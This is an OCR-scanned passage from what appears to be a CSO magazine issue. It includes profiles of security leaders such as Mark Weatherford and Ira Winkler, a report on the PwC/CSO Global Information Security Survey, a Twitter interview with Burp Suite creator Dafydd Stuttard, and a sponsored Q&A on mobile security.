ance  of  protection,  reducing  our  risk  and  add¬ 
ing  business  value."  Pettigrew  takes  a  calmer 
approach,  which  is  right  for  HMS,  she  says. 

Pettigrew  says  he  is  four  years  into  a  seven- 
to-10-year  journey  to  complete  his  vision  for 
security  at  HMS. 

“Right  now,  I  am  very  happy  with  where  I 
am.  It’s  very  rewarding,"  he  says. 
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as  in  government.  But  his  days  in  the  public  sector  were  far  from  over. 

In  the  summer  of  2011  he  got  a  call  asking  if  he  was  interested  in 
working  as  a  deputy  undersecretary  for  cybersecurity  at  the  Depart¬ 
ment  of  Homeland  Security.  DHS  Secretary  Janet  Napolitano  encour¬ 
aged  him  to  join  the  team.  Weatherford  wasn’t  interested,  frankly. 

“I  didn’t  want  to  go  back  to  work  for  the  government.  Knowing  the 
bureaucracy  and  inertia  in  the  government,  I  knew  I  would  struggle 
with  that,”  he  says.  Eventually,  he  became  convinced  he  would  regret  it 
for  the  rest  of  his  life  if  he  passed.  “Very  few  people  get  an  opportunity 
to  do  something  like  that,"  he  says.  So  he  took  the  job. 


UNLIKE  MANY  CSOS,  WHO  SEEM  TO  TAKE  A  WINDING 
path  to  the  role,  Mark  Weatherford  likes  to  say  he’s  been  working  in  in¬ 
formation  security  his  whole  life.  In  grad  school  as  part  of  his  Navy  ser¬ 
vice  in  the  1990s,  Weatherford  wrote  a  thesis  on  information  security, 
an  unusual  topic  at  the  time. 

“It  makes  me  cringe  to  read  it  now,”  he  acknowledges  with  a  laugh. 
“No  one  talked  about  information  security  at  the  time.” 

His  last  job  in  the  service  was  running  the  Navy's  computer  network 
defense  operations  and  its  instant-response  team.  “That  set  the  course 
for  my  career,”  he  says.  Following  several  years  at  Raytheon,  Weather¬ 
ford  began  working  for  state  government,  starting  in  2006 
as  Colorado’s  first  CISO. 

“I  built  that  program.  It  was  unique  and  groundbreak¬ 
ing  at  the  time,”  says  Weatherford.  Many  states  then  had 
someone  to  head  information  security,  but  Colorado  was 
the  first  state  to  enact  legislation  to  elevate  the  topic  of 
cybersecurity,  according  to  Weatherford.  “It  was  my  first 
foray  into  the  sausage-making  of  politics,  working  with  a 
state  senator  and  a  state  legislator,  seeing  the  negotia¬ 
tions  back  and  forth.  It  was  very  enlightening.” 

Being  the  head  of  security  for  a  state  government-or 
indeed  any  governmental  agency-requires  a  perpetual 
balancing  act  and  careful  compromise,  as  Weatherford 
learned.  “Being  a  security  guy,  I  want  to  be  autocratic  in  a 
way  that  you  simply  can’t  be  in  government  if  you  want  to 
get  anything  done.” 

And  then  there’s  the  issue  of  funding,  which  came 
into  sharp  focus  when  Weatherford  took  a  job  as  CSO  for 
then-California  governor  Arnold  Schwarzenegger.  About  a 
month  after  he  started  his  new  role,  the  state  began  expe¬ 
riencing  major  budget  issues  that  went  on  for  years.  “My 
tenure  there  was  marked  by  doing  something  with  noth¬ 
ing.  We  had  to  become  creative  and  resourceful,"  he  says. 

At  the  end  of  that  administration,  Weatherford  was 
lured  by  a  friend  to  his  first  role  in  the  private  sector  in 
years,  at  the  North  American  Electric  Reliability  Corp., 
where  he  directed  the  cybersecurity  and  critical  infrastruc¬ 
ture  protection  program. 

He  relished  the  role.  “I  loved  working  in  the  electricity  in¬ 
dustry.  It’s  something  tangible.  We  are  all  so  dependent  on 
electricity.  It  was  exciting,”  he  says.  And  while  the  security 
budgets  were  hardly  limitless,  they  nowhere  near  as  tight 
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Weatherford,  a  principal  at  The  Chertoff  Group,  understands 
security  from  both  governmental  and  commercial  perspectives 


Danuta  Otfinowski 


He  was  pleasantly  surprised  at  the  dedica¬ 
tion  of  the  people  working  in  the  DHS  cyber¬ 
security  and  communications  organization. 
“They  do  a  lot  with  not  a  lot,”  he  says. 

Figuring  out  how  to  share  information  be¬ 
tween  agencies  and  departments  was  a  major 
part  of  his  role.  To  do  it,  Weatherford  worked 
on  the  National  Cybersecurity  Communica¬ 
tions  and  Integration  Center  (NCIC),  whose 
job  is  to  coordinate  cybersecurity  across  the 
government-law  enforcement,  FBI,  Secret 
Service,  Department  of  Defense,  private  sec¬ 
tor,  states,  and  so  on. 

“It  was  refreshing.  People  who  would  never 
know  each  other  or  talk  to  each  other  would 
interact  on  a  daily  basis,”  says  Weatherford. 
“This  group  had  been  very  immature  and 
not  functioning  well.  We  helped  turn  it  into 
a  high-performance  machine."  He  credits  his 
team  for  their  work. 

Leading  up  to  the  presidential  election  last 
year,  Weatherford  started  looking  around  to 
see  what  else  was  out  there,  in  case  of  regime 
change.  The  opportunities  he  saw  were  so  ex¬ 
citing  that  he  decided  to  make  a  move  regard¬ 
less  of  whether  Obama  got  re-elected. 

“I  was  like  a  kid  in  a  candy  store.  I  was  ready 
to  go  back  to  the  private  sector,”  he  says. 

As  he  looked  at  different  companies,  rang¬ 
ing  from  startups  to  large  enterprises,  he 
crossed  the  latter  off  the  list. 

“I  didn’t  want  to  get  back  into  a 
bureaucracy.” 

Consulting  presented  itself  as  the  oppor¬ 
tunity  that  would  allow  much  more  flexibility 
and  autonomy.  He  joined  The  Chertoff  Group 
in  April  this  year. 

“Most  of  my  life,  I  have  done  operational 
jobs.  I  just  wanted  to  do  something  different. 

I  wanted  to  focus  on  cybersecurity  and  work 
with  clients  around  the  world.  It  has  been  an 
interesting  transition,”  he  says. 

"What  I  enjoy  the  most  is  getting  to  work 
with  a  lot  of  different  companies.  The  compa¬ 
nies  that  are  calling  us  really  need  my  help,” 
he  says.  “I  am  able  to  both  satisfy  my  security 
jones  and  help  companies  from  a  strategic 
perspective. 

"It’s  been  an  interesting  career.  Who  knows 
what  else  is  in  my  future?” 


Ira  Winkler 

The  Awareness  Crusader 

To  Winkler,  reducing  security  risks  comes 
down  to  creating  the  right  culture  rather 
than  aiming  for  bulletproof  technology 


WITH  A  RESUME  THAT  IN- 
cludes  certifications,  several  books,  and 
frequent  speaking  and  guest  colum¬ 
nist  gigs,  Ira  Winkler  is  a  recognized 
leader  in  the  security  industry  today. 
Currently  president  of  the  10,000-plus 
member  Information  Systems  Security 
Association,  Winkler  is  also  president  of 
consultancy  Secure  Mentem.  Not  bad 
for  a  guy  who  majored  in  psychology 
and  says  he  wanted  nothing  to  do  with 
computers  in  his  college  days. 

How  did  he  get  from  there  to  here? 


“No  one  else  would  hire  me  but  the  U.S. 
government,”  says  Winkler  jokingly.  In 
truth,  he  took  an  aptitude  test  on  a  lark 
while  considering  career  paths  senior 
year  and  discovered  to  his  surprise  he 
had  a  flair  for  the  technical. 

After  gaining  the  requisite  clearance, 
he  took  a  job  as  an  intelligence  analyst 
with  the  National  Security  Agency.  Win¬ 
kler  quickly  realized  that  jobs  working 
with  computers  paid  better  than  those 
that  did  not,  so  he  grudgingly  took  a 
position  as  programming  support  for 
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cryptanalysis  system  development  in  field 
operations,  where  he  spent  three  years.  His 
background  in  intelligence  taught  him  one 
thing:  No  one  cares  how  you  get  the  data, 
it’s  the  data  itself  that’s  important. 

This  lesson  served  Winkler  well  in  subse¬ 
quent  years,  during  which  he  hacked  corpo¬ 
rate  information  through  unconventional 
means  such  as  bugging  the  office  of  the 
Fortune  100  executive  who  hired  him  to  do 
penetration  testing.  His  goal  was  to  get  to 
the  heart  of  the  business  value  of  a  security 
breach,  which  is  a  much  more  relevant  de¬ 
scription  to  a  business  executive  than  the 
typical  security  terms,  he  believes, 

After  bugging  his  employer  many  years 
ago,  Winkler  walked  into  the  executive's 
office  and  reeled  off  detailed  information 
about  the  company’s  mergers  and  acquisi¬ 
tions  and  products  under  development. 

“I  said,  ‘I  have  here  everything  you  hold 
valuable  to  your  whole  company.'  That  put 
a  business  value  on  it.  He  bumped  up  the 
security  budget  by  $10  million  and  hired 
security  officers." 

“Executives  don’t  care  if  you  get  on  their 
network,"  Winkler  says.  They  figure  other 
outsiders  are  probably  on  there  already  and 
it  hasn’t  hurt  their  business  any.  What’s  rel¬ 
evant:  the  cost  to  the  business-in  dollars — 
of  any  past  or  imminent  loss  due  to  that 
security  breach.  Of  course,  proving  your  cost 

“Awareness  is 
a  continual 
process.  It  is  not 
a  program  to 
tell  people  to  be 
afraid  to  check 
their  e-mail.” 

-IRA  WINKLER,  PRESIDENT, 
SECURE MENTEM 


estimate  is  accurate  is  easier  said  than  done. 

In  business,  every  decision  requires  a 
balancing  act.  In  a  perfect  world,  everyone 
would  ensure  that  their  networks  were  free 
from  intrusions  from  foreign  governments 
such  as  China,  which  is  the  main  offender  of 
late.  But  of  course,  that’s  not  always  how  it 
works  out. 

"They  want  to  do  business  with  China, 
so  they’re  willing  to  accept  that  some  of 
their  data  will  be  lost  in  exchange  for  a 
larger  portion  of  the  Chinese  market.  It 
comes  down  to  understanding  the  business 
risk:  Here’s  what  we  are  preventing  and 
here’s  what  it’s  going  to  cost  to  prevent,” 
Winkler  says. 

It  is  critical,  in  his  view,  for  security  pro¬ 
fessionals  to  identify  risks  to  the  business 
and  find  cost-justified  security  measures  to 
mitigate  those  risks.  No  CEO  wants  to  hear 
he  should  spend  tens  or  hundreds  of  mil¬ 
lions  of  dollars  to  rebuild  his  computer  net¬ 
work.  After  all,  hackers  will  come  right  back 
the  day  you  turn  it  on.  What  security  pros 
must  do  instead  is  focus  on  securing  the 
environment  in  a  way  that’s  aligned  with 
business  value. 

Equally  important  is  to  instill  the  entire 
organization  with  security  awareness  that 
goes  far  beyond  simple  training  and  aims 
to  change  individuals’  behavior.  Secure  Men- 
tem,  Winkler’s  current  company,  offers  a 
security  awareness  methodology  that  takes 
culture  into  account. 

"Awareness  is  a  continual  process,”  wrote 
Winkler  in  a  recent  column.  “It  is  not  a  pro¬ 
gram  to  tell  people  to  be  afraid  to  check 
their  email.” 

“Security  is  all  about  the  human,  from 
start  to  finish,”  he  says.  “There  will  always 
be  a  malicious  entity  out  there  trying  to 
get  on  your  network."  But  what  Winkler 
calls  the  “malignant”  security  issues-em- 
ployees  clicking  on  unverified  attachments, 
for  example,  or  that  old  standby,  writing 
passwords  on  sticky  notes-can  cause  even 
more  damage. 

For  those  issues,  there  is  little  to  be  done 
but  raise  awareness.  Winkler  has  made  that 
cause  his  lifework. 
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INDUSTRY  CHATTER 
ON  TWITTER 

Infosec  analogies  are 
like  Jagermeister: 
sweet,  but  get 
you  into  trouble. 

Gal  Shpantzer  @Shpantzer 

There  is  no  right  way 
to  do  information 
security,  but  there 
are  A  LOT  of  wrong 
ways,  and  I’ve  seen 
hundreds  of  them. 

Info  Security  Jerk  @infosecjerk 

“As  someone 
who  is  passionate 
about  information 
security...”  Voicemail 
from  vendor  who 
used  a  phrase  from 
my  Linkedln  profile. 
Felt  dirty. 

Steve  Werby  @stevewerby 

Becky  Bace  at  the 
NSA  claims  the  NSA 
helped  capture  me.  I 
wonder  what  uncon¬ 
stitutional  methods 
were  secretly  used? 

Kevin  Mitnick  @kevinmitnick 
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Organizations  are  investing  to  improve  their 
risk  posture,  but,  as  our  the  11th  annual 
Global  Information  Security  Survey 
finds,  breaches  and  their  associated  costs 
continue  to  rise  By  George  V.  Hulme 


©  SECURITY  PROFESSION- 
als  are  being  hammered  by  a  pow¬ 
erful  combination  of  forces:  As 
IT  systems  get  more  difficult  to 
defend— more  open,  mobile  and 
shared— cyber-threats  are  also 
evolving  to  more  swiftly  penetrate 
enterprise  defenses. 

That  is  one  of  the  core  findings 
of  the  nth  annual  Global  Informa¬ 
tion  Security  Survey,  conducted 
by  PricewaterhouseCoopers  and 
CSO.  The  survey  also  found  that 
despite  many  of  the  more  than 
9,600  execs  surveyed  saying  that 
their  organizations  have  increased 
IT  security  spending,  the  num¬ 
ber  of  attacks  they’re  enduring 
and  the  costs  of  those  attacks 
keeps  rising.  And  not  only  are 
attacks  increasing,  but  so  are  the 
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costs  per  incident,  with  the  average  losses  per  inci¬ 
dent  up  23  percent  year  over  year.  The  number  of  those 
reporting  losses  of  greater  than  10  million  per  incident 
is  up  75  percent  from  just  two  years  ago. 

An  Abundance  of  (Over)confidence 

Despite  those  setbacks,  this  year’s  survey  reveals  an 
unexpectedly  high  level  of  confidence  in  the  robust¬ 
ness  of  respondents’  security  efforts.  A  whopping  84 
percent  of  CEOs  and  82  percent  of  CIOs  believe  their 
programs  are  effective  in  their  current  state.  Even 
CISOs,  a  traditionally  cautious  bunch,  are  only  slightly 
less  sure,  with  78  percent  expressing  confidence. 

This  optimism  is  maintained  despite  the  fact  that  the 
number  of  security  incidents  detected  has  risen  con¬ 
siderably  year  over  year:  from  2,989  reported  in  2012 
to  3,741  in  2013.  A  full  18  percent  of  respondents  report 
not  knowing  the  number  of  incidents  they  detected. 

This  isn’t  to  say  that  enterprises  aren’t  taking  many 
of  the  right  steps  to  protect  their  data — they  are.  The 
survey  shows  that  even  those  enterprises  that  haven’t 
been  taking  adequate  precautions  plan  to  do  a  better 
job  in  the  future.  Many  report  they’ll  soon  be  setting 
minimum  security  standards  for  external  partners,  cus¬ 
tomers  and  suppliers,  as  well  as  instituting  employee 
security  awareness  training  programs. 


Information  Security  Budgets 
Increase  Significantly 


“Now,  when  we  talk 
about  a  high  risk— 
whether  it’s  a  physical 
security  risk  or  an 
IT  risk  or  a  hiring  a 
person-we  all  know 
what  ‘high’  means.” 

-TIM  MCCREIGHT,  CISO, 

GOVERNMENT  OF  ALBERTA 

Not  surprisingly,  many  security  practitioners  dis¬ 
agree  with  this  year’s  survey  respondents  about  the 
overall  state  of  IT  security.  “The  bad  guys  basically  go 
where  they  want  to  go  and  do  what  they  want  to  do, 
and  they’re  not  being  stopped.  Maybe  for  every  one 
organization  that’s  effectively  stopping  attacks,  there 
are  100  that  are  being  breached,”  estimates  Eric  Cow- 
perthwaite,  CISO  of  Providence  Health  and  Services. 

When  those  breaches  do  occur, 
the  impact  remains  high:  35  percent 
of  respondents  report  that  employee 
records  were  compromised,  31  per¬ 
cent  report  customer  records  were 
compromised  or  unavailable,  and 
29  percent  say  internal  records  were 
lost  or  damaged.  Also  significant: 
reports  of  lost  or  damaged  internal 
records  this  year  jumped  100  per¬ 
cent  from  last  year. 

Those  losses  are  occurring 
despite  increased  resources  being 
directed  at  the  security  challenge — 
security  budgets  averaged  $4.3  mil¬ 
lion  this  year,  a  gain  of  51  percent 
over  2012. 

Yet  despite  the  spending,  enter¬ 
prises  are  still  playing  catchup.  As 
IT  organizations  master  the  secu¬ 
rity  and  management  of  one  set  of 
technologies,  something  disruptive 
and  new  always  comes  up,  whether 
it’s  virtualization,  cloud,  the  con- 
sumerization  of  IT  purchasing  or 


Security  budgets  average  $4.3  million  this  year,  a  gain  of  51  percent 
over  2012.  Organizations  understand  that  today’s  elevated  threat 
landscape  demands  a  substantial  boost  in  security  investment. 

Average  information  security  budget: 


$4.3M 


2009  2010  2011  2012  2013 
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increased  worker  mobility.  And  it’s  this  change  that,  if 
not  properly  managed,  can  create  so  many  hazards  for 
CIOs  and  their  security  teams. 

A  Proper  Alignment 

One  of  the  best  ways  to  ensure  that  enterprise  technol¬ 
ogy  doesn’t  rush  past  IT’s  ability  to  secure  it  is  to  keep 
business  management  and  IT  security  management 
aligned. 

One  of  the  big  reasons  that  business  management 
and  IT  security  remain  misaligned,  says  Mike  Roth¬ 
man,  president  of  independent  research  firm  Securosis, 
is  the  lack  of  proper  metrics  available  to  measure  the 
business  impact  of  security  activities.  “That  remains 
a  huge  gap.  Business  managers  understand  business 
metrics,  and  IT  security— for  better  or  for  worse— 
doesn’t  lend  itself  to  those  business  impact  metrics. 
And  there  is  the  disconnect,”  Rothman  says. 

“In  the  last  10  years,  we  fought  just  to  get  the  CISO 
recognized  and  have  a  seat  at  the  table,”  says  Tim 
McCreight,  CISO  for  the  government  of  Alberta.  And 
although  CISOs  are  more  widely  recognized  now,  they 


don’t  all  have  the  same  levels  of  influence.  The  posi¬ 
tion  means  different  things  in  different  organizations, 
and  all  those  organizations  are  at  different  levels  of 
security  maturity.  In  some  places,  the  CISO  is  buried 
deep  in  the  management  structure,  while  in  others  it’s 
equivalent  to  a  vice  president  and  reports  directly  to 
the  C -suite. 

In  too  many  organizations,  decisions  regarding  new 
IT  projects,  application  design  and  deployments,  and 
procured  services  are  made  without  getting  any  input 
from  IT  security  groups.  And  when  security  is  actually 
brought  in,  it’s  often  toward  the  very  end  of  the  initia¬ 
tive,  when  it’s  too  late  to  offer  constructive  advice  or 
establish  cost-effective  security  controls. 

To  improve  his  organization’s  ability  to  make  smarter 
risk-based  decisions,  McCreight  shifted  Alberta’s 
CISO  role  to  that  of  a  risk  adviser  to  the  business,  not 
a  service  provider.  For  instance,  a  business  manager 
recently  asked  McCreight  to  endorse  the  architecture 
for  a  new  initiative. 

“I  said  no,  it’s  your  architecture,”  he  says. 

Now,  individual  business  unit  owners  accept  the  risk 
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posture  of  their  systems.  How  did  McCreight  get  the 
organization  to  that  point?  It  required  that  everyone 
speak  the  same  language  when  discussing  risk. 

Something  as  seemingly  simple  as  determining  what 
low,  medium  and  high  levels  of  risk  means  can  in  reality 
be  incredibly  complicated,  because  “acceptable  risk” 
means  different  things  to  different  people  depending 
on  their  experience  and  personality.  To  get  everyone 
aligned,  McCreight  assembled  a  team  of  subject-mat¬ 
ter  experts  from  various  business  units  and  manage¬ 
ment  teams,  including  representatives  from  business 
continuity  teams,  IT  teams  and  the  ranks  of  project 
leaders.  “We  got  everybody  into  a  room,  and  they  didn’t 
come  out  until  they  determined  their  shared  definition 
of  high,  medium  and  low  risk — and  they  understood 
what  the  likelihood  and  impact  [of  a  security  event] 
meant  to  them,”  he  says. 

Those  meetings  took  a  year.  “Now,  when  we  talk 
about  a  high  risk— whether  it’s  a  physical  security  risk 
or  an  IT  risk  or  a  hiring  a  person— we  all  know  what 
‘high’  means,”  McCreight  says. 

To  the  Cloud 

Cloud  computing  is  changing  how  many  organizations 
view  risk.  This  year,  47  percent  of  respondents  report 
using  cloud  computing,  and  of  those  using  cloud, 


59  percent  believe  their  security  posture  has  improved, 
yet  only  18  percent  include  rules  about  cloud  in  their 
security  policies.  Software  as  a  service  remains  the 
most  widely  adopted  cloud  service,  staying  steady  at 
69  percent  adoption,  and  platform  as  a  service  shows 
the  strongest  year-over-year  growth,  increasing  from 
29  percent  to  37  percent. 

Martin  Sandren,  enterprise  architect  for  security  at 
Blue  Cross  Blue  Shield,  explains  how  he  believes  the 
insurer  has  dramatically  reduced  risk  by  moving  to  the 
cloud.  “We  have  made  a  huge  shift  to  cloud — about  80 
percent  of  all  the  systems  we  build  today  are  cloud- 
based.  Almost  nothing  goes  into  our  internal  systems 
anymore,”  Sandren  says. 

This  move,  Sandren  explains,  has  helped  mitigate  a 
considerable  amount  of  the  risk  that  results  from  the 
security  practices  of  its  smaller  partners.  “As  a  payer 
organization,  we  have  a  lot  of  small  suppliers  who  run 
with  a  very  small  IT  operations ,  but  they’re  really  good 
at  a  specific  business  task.  This  is  a  potentially  risky 
situation,  especially  when  sharing  regulated  data,” 
Sandren  says. 

“For  these  businesses — and  that’s  a  lot  of  that  [type 
of]  business — the  cloud  has  made  it  much  easier  for 
them  and  us  to  manage  risk,”  Sandren  adds.  Before, 
these  10-person  companies  usually  ran  off  a  couple 
of  servers  sitting  under  someone’s 
desk.  “Now,  these  same  small  busi¬ 
nesses  have  their  servers  hosted 
on  a  cloud  provider  that  we  vetted. 
Suddenly  they  have  the  same  kind  of 
physical  security  we  find  in  an  enter¬ 
prise  data  warehouse.  That’s  helped 
us  a  lot  in  quantifying  risk,”  he  says. 

Steve  Phillips,  CIO  at  Avnet,  the 
$25.5  billion  electronics  distributor, 
also  puts  cloud  vendors  through  a 
vigorous  vetting  of  their  security 
capabilities  and  maturity.  “You 
can’t  outsource  risk  or  reputation 
damage  should  something  happen,” 
s  ays  Phillips .  “  That ’s  why  we  put  our 
providers  through  a  serious  evalu¬ 
ation — not  a  simple  check-the-box 
exercise — to  make  sure  they  have 
the  capabilities  to  provide  the  level 
of  security  we  expect,”  Phillips  says. 

To  ensure  that  IT  and  cloud 
service  providers  live  up  to  their 
claims,  Phillips  also  makes  sure 
that  their  contracts  include  certain 


Respondents  Detect  More  Incidents 

The  number  of  incidents  detected  in  the  past  12  months 
increased  by  25  percent.  Also  troubling:  Respondents  who  do  not 
know  the  number  of  incidents  detected  by  their  organizations 
doubled  over  two  years.  This  may  be  due  to  continued 
investments  in  security  products  based  on  outdated  models. 

Average  number  of  security  incidents  in  a  year: 


3,741 


2011  2012  2013 
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Attacks  Backed  by  Nation  States 
Make  Headlines  but  Remain  Rare 

Only  4  percent  of  respondents  report  security  incidents  perpetrated  by 
foreign  nation  states.  Hackers  represent  a  much  more  likely  danger. 

Estimated  likely  source  of  incidents: 


Hackers 
Competitors 
Organized  crime 

Acitivists 

Terrorists 

Foreign 

organizations 


32% 


Foreign  nation 
states 


4% 


clauses,  such  as  one  requiring  the 
provider  to  relay  information  on  any 
breaches  and  another  giving  Avnet 
an  escape  hatch  if  the  breach  be 
serious  enough  to  warrant  a  termi¬ 
nation  of  the  relationship. 

A  Step  Behind 

Why  are  the  costs  of  data  breaches 
rising  despite  the  substantial 
increase  in  security  investments 
among  the  enterprises  surveyed? 

Certainly  some  of  it  can  be  attrib¬ 
uted  to  the  rising  costs  of  respond¬ 
ing  to  breach  disclosures,  increased 
threats,  and  a  higher  priority  placed 
on  cybersecurity.  However,  a  big 
part  of  the  rising  cost  is  that  too 
much  emphasis  is  placed  on  pre¬ 
venting  and  spotting  attacks,  when 
organizations  should  also  be  devel¬ 
oping  the  ability  to  respond  when 
the  inevitable  occurs. 

Many  respondents  still  can’t 
adequately  identify  or  respond  to 
breaches.  In  fact,  only  6i  percent 
inspect  their  inbound  and  outbound 
network  traffic,  and  less  than  that 
had  used  malware  analytics  to  fight 
advanced  threats,  or  used  security  event  and  informa¬ 
tion  management  systems  to  detect  potential  incidents. 

“We  are  all  taught  in  security  101  to  put  the  basic 
defensive  controls  in  place  first.  Most  don’t  get  to  that 
point,  let  alone  beyond  it.  However,  there  are  compa¬ 
nies  out  there,  more  mature  companies,  that  have  built 
in  the  ability  to  respond,”  says  Rothman.  “The  problem 
is  that  they  are  not  the  general  population.  Typically,  if 
they  see  a  breach — if  they  even  see  it  in  the  first  place- 
most  will  call  their  service  provider,”  he  says.  And  even 
among  companies  that  do  invest  in  the  technology 
needed  to  detect  and  respond  to  attacks,  many  don’t 
have  the  expertise  on-staff  to  take  full  advantage  of  the 
tools’  capabilities. 

If  you  can’t  see  the  threats,  it’s  almost  impossible 
to  respond  to  them  intelligently,  and  this  reality  is 
reflected  in  the  survey  results.  Only  18  percent  of 
organizations  reported  being  extremely  effective  at 
reporting,  managing  and  intercepting  cyberthreats. 
The  majority  reported  that  they  were  minimally  effec¬ 
tive  or  did  not  know  how  effective  they  were. 

The  industry  is  “too  heavy-handed  when  it  comes 


to  investing  in  preventative  controls,”  says  Jay  Leek, 
CISO  at  private  equity  firm  The  Blackstone  Group. 
“We  have  not  invested  enough  in  detective  and  reac¬ 
tive— what  I  call  ‘response’— controls.  I  believe  that  we 
need  to  focus  more  on  how  well  we  can  identify  and 
respond  to  attacks,”  he  says. 

“If  you  look  at  security  programs  in  large  organiza¬ 
tions,  they  probably  spend  70  to  80  percent  of  their 
budget  on  preventative  measures.  These  budgets,  I 
found,  also  largely  correlate  to  where  resources  are 
typically  focused,  leaving  only  20  to  30  percent  focused 
on  detective  and  reactive  controls,”  Leek  says. 

“It’s  clearly  not  working,”  he  adds.  “And  I  would  think 
that  incident  response  would  be  an  ideal  place  to  focus 
today  because  the  nature  of  IT  systems  and  their  com¬ 
plexity  means  the  chance  of  one  experiencing  a  secu¬ 
rity  breach  has  got  to  be  high.  You  have  to  assume  you 
would  need  the  ability  to  respond  one  day.” 


■  George  V.  Hulme  is  a  freelance  security  and  technol¬ 
ogy  writer  based  in  Minnesota.  Follow  him  on  Twitter: 
@georgevhulme. 
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Ten  Tweets  Dafydd  Stuttard 

@PortSwigger 

This  month,  CSO  tweeterviews  Dafydd  Stuttard  about  his 
security  philosophy,  his  inspiration  for  his  web  app  testing 
tool  Burp  Suite,  and  his  affinity  for  a  nice  glass  of  port. 


CSO:  Tell  us  first  about  your  background  in 
the  industry.  How  did  you  get  started  in 
security? 

Dafydd  Stuttard:  My  first  job  was  as  an 
IT  auditor,  which  was  pretty  dull.  I  got  to 
know  some  much  cooler  people  doing  pen 
testing,  who  taught  me  about  it. 

And  what  first  appealed  to  you  about  pen 
testing 7  /4s  opposed  to  auditing,  did  you  find 
it  exciting  ? 

I  got  to  solve  weird  problems  and  be 
devious,  both  of  which  appealed. 

Fun!  OK,  tell  us  how  you  came  up  with  the 
@PortSwigger  handle. 

It’s  a  pun.  When  I  started,  most  tools  had 
“port”  in  the  name  (port  scanner,  etc.). 

I  was  quite  partial  to  a  glass  of  port. 

A  much  tamer  answer  than  I  anticipated. 

So  being  in  security  has  not  led  you  to  be  a 
habitual  portswigger? 

Not  exactly.  I  pretty  much  only  do  Web 
apps  these  days,  and  those  buzzwords 
don’t  sound  as  quaffable. 

LOL.  What  would  you  point  to  as  one  of  the 
most  major  changes  in  security  since  you  first 
started  in  the  profession? 

More  attack  surface,  more  threats,  more 
determined  attackers,  more  government- 
sponsored  attacks.  Very  marginally 
improved  defenses. 


What,  in  your  opinion,  could  the  industry 
do  better  to  score  higher  than  "marginally 
improved"  when  it  comes  to  defenses? 

Unfortunately  attack/defense  is  too 
asymmetric  a  challenge,  and  defense  is  not 
(currently)  commercially  critical.  That  may 
change. 

Speaking  of  defenses,  you’re  the  creator  of  the 
Burp  Suite  for  performing  security  testing  on 
Web  apps.  What  was  your  inspiration? 

I  was  a  lazy  pen  tester  and  wanted  to 
automate  my  work.  The  tools  at  the  time 
were  primitive,  so  I  started  writing  my  own. 

Interesting.  And  what  about  today?  What’s 
your  security  philosophy?  And  how  do  you 
apply  it  to  your  daily  work? 

I  can’t  say  I  have  a  burning  desire  to  secure 
the  world.  I  just  like  writing  sectools.  On  a 
personal  level,  I  err  on  the  side  of  paranoia. 

Complete  this  sentence:  If  I  weren't  working  in 
security,  I  would _ . 

I  would  probably  be  doing  something 
geeky  with  computers,  writing  a  lot  of  code, 
and  working  just  as  hard. 

Sounds  like  your  career  is  right  where  it  should 
be  then!  OK,  time  to  pass  the  bottle  of  port. 
Who  should  CSO  tweet  with  next  ? 

@stevelord  would  be  fun— he  organizes  the 
great  #44Con.  And  @stevelord  does  look 
exactly  like  his  profile  pic,  by  the  way. 
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Andy  Daudelin 

VP  OF  SECURITY  SERVICES  FOR 
AT&T  BUSINESS  SOLUTIONS 

Andy  is  responsible  for 
scaling  the  company's 
security  services  across  its 
global  network  and  inte¬ 
grating  them  into  the  AT&T 
business  solutions  portfo¬ 
lio.  Previously,  he  served 
as  the  VP  of  IT  Services 
and  Vice  President  Global 
Engineering.  Prior  to  joining 
AT&T,  Andy  worked  as  a 
digital  circuit  designer  for 
the  U.S.  Army. 


FOR  MORE  INFORMATION 

visit  www.att.com/toggle 

To  view  a  video  webcast  with  Andy 
and  iDC's  Chris  Christiansen,  go  to 

www.cso.com/webcasts/att. 
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A  Layered  Approach  to 
Mobile  Security 

Moving  beyond  a  device-centric  strategy 
without  adding  complexity 


The  explosion  of  mobility  and  mobile 
devices  has  shattered  the  concept  of 
securing  company  data  behind  firewalls 
and  tight  perimeters.  IT  leaders  need  an 
approach  to  mobile  security  that  goes  beyond 
simple  device  management.  The  answer 
turns  out  to  be  layered  management 

What  impact  has  the  explosion  in  mobility 
had  on  the  overall  threat  landscape? 

First,  you  no  longer  have  the  ability  to  control 
your  corporate  assets  within  a  perimeter.  Mobil¬ 
ity  to  me  is  not  only  devices,  such  as  tablets  and 
mobile  phones.  It’s  also  data  and  application 
access  in  the  cloud.  While  this  gives  users  great 
flexibility  and  options,  it  means  the  security  risk 
landscape  has  expanded  exponentially.  Second, 
mobility— and  especially  bring-your-own- 
device  policies— means  you  have  to  protect  both 
corporate  and  personal  devices  accessing  your 
network.  With  so  many  personal  devices  enter¬ 
ing  the  workspace,  employees  may  not  be  careful 
about  what  apps  they  load  or  what  sites  they  visit. 

Finally,  in  general,  the  overall  security  threat 
landscape  has  increased  and  there  are  more  en¬ 
try  points.  You  find  that  hackers  are  ramping 
up  their  efforts,  so  attacks  are  becoming  more 
frequent,  broader  in  scope,  more  complex,  and 
harder  to  defend. 

How  are  the  drivers  of  mobility— things  like 
productivity  and  agility— affecting  security 
challenges  for  IT? 

IT  doesn’t  have  the  inherent  control  that  it  used 
to  have,  so  IT  needs  to  be  more  proactive  in 
establishing  safety  mechanisms.  Second,  these 
drivers  amp  up  the  requirement  for  speed. 

Five  or  ten  years  ago,  we  thought  nothing  of  a 
major  IT  project  taking  months  or  years.  Today, 
we  think  in  terms  of  weeks  and  days.  This  puts 
pressure  on  IT  to  be  able  to  react  very  quickly. 
Many  organizations  are  going  outside  their 
four  walls  to  build  an  adaptive  strategy  and 
they  are  evaluating  some  of  the  newer  platform 


solutions  that  are  holistic  in  nature,  versus 
disparate  mainstream  management  tools. 

How  are  IT  and  security  staff  getting  ahead 
of  the  security  issues  resulting  from  use  of 
consumer-based  applications? 

IT  is  looking  to  have  checks  and  balances  built 
into  filtering.  That  means  stronger  web  security 
services,  URL  filtering,  and  other  things  that 
can  check  the  safety  of  an  app  before  it’s  loaded 
onto  a  device.  This  space  in  general  is  new  and 
IT  staffs  are  still  trying  to  figure  it  out.  It’s  no 
longer  just  50  or  so  corporate  applications  that 
are  tightly  controlled.  You’ve  got  to  consider 
any  of  the  myriad  of  apps  that  one  of  your  users 
can  get  easily  from  an  apps  store. 

The  focus  of  a  lot  of  mobile  security 
strategy  today  is  on  the  device.  Do  you  see 
anything  wrong  with  that? 

Everything  is  wrong  with  that  device-centric 
approach.  While  the  device  does  need  to  have 
focus,  it’s  really  just  the  tip  of  the  iceberg. 

CIOs  need  to  employ  a  comprehensive  mobile 
